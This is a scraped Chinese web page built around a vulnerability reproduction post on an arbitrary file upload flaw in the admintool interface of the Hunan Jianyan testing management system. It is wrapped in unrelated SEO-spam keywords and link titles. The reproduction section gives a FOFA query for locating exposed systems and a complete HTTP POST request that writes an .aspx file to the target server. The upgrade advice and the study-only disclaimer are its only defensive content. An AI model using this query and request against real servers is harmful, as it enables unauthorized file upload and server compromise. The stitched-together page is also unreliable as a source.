当前位置: 首页 > news >正文

金融公司网站建设hao123网址之家官网

金融公司网站建设,hao123网址之家官网,网站建设电销话术范文,wordpress插件中使用表单文章目录 前言声明一、漏洞详情二、影响版本三、漏洞复现四、修复建议 前言 湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。 声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者…

文章目录

  • 前言
  • 声明
  • 一、漏洞详情
  • 二、影响版本
  • 三、漏洞复现
  • 四、修复建议


前言

湖南建研检测系统 admintool接口任意文件上传漏洞,攻击者可通过该漏洞获取服务器敏感信息。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞详情

本检测信息管理系统能够实现检验工作的计算机化和网络化管理,基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性,确保检验报告的规范性和权威性,确保检验工作的高效率和服务的及时性, admintool 接口存在任意文件上传漏洞。

二、影响版本

湖南建研-检测系统 

在这里插入图片描述

三、漏洞复现

FOFA: body="/Content/Theme/Standard/webSite/login.css"

上传文件数据包

POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: ip:host
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, brfilePath=log.aspx&fileContent=abc

在这里插入图片描述
访问上传路径
在这里插入图片描述

四、修复建议

升级至最新版本

http://www.zhongyajixie.com/news/39009.html

相关文章:

  • 网站做防劫持百度竞价代运营外包
  • 网站的模糊搜索怎么做seo搜索排名优化
  • 不知此网站做男人也百度竞价sem
  • 权威的公司网站制作十大经典事件营销案例分析
  • 东莞网站制作公司是什么朋友圈产品推广文案
  • 青岛网站设计网站网站的开发流程
  • 佘山网站建设seo免费诊断
  • 惠州专业做网站成品网站源码在线看
  • 做程序网站需要什么代码沈阳头条今日头条新闻最新消息
  • 深圳公司网站如何设计品牌网
  • 学习做网站可以吗怎么在百度上发布信息广告
  • 用html做登录网站北京seo优化
  • python做视频点播网站免费宣传平台有哪些
  • 北京做网站优化媒体平台
  • 做网站销售好不好优化方案怎么写
  • 如何对django网站做测试网络推广平台
  • 贵阳网站建设制作价格seo快速排名软件品牌
  • 低价网站建设靠谱吗今日头条网页版入口
  • 河南做网站 河南网站建设营销策略怎么写模板
  • 石家庄集团公司网站建设网上seo研究
  • 太原网络营销网站优化网站的方法有哪些
  • 怎么样上传网站资料广西网站建设
  • 个人网站做微擎百度2022第三季度财报
  • 可以做策略回测的网站济南网站建设哪家便宜
  • 专业做汽车的网站推广seo公司
  • 郑州网站开发建设怎么做推广
  • 重庆网红景点排行榜前十名东莞seo建站如何推广
  • 网站推广要我营业执照复印件seo外链购买
  • 模板建站和仿站seo招聘信息
  • 做图用哪个素材网站色盲测试图看图技巧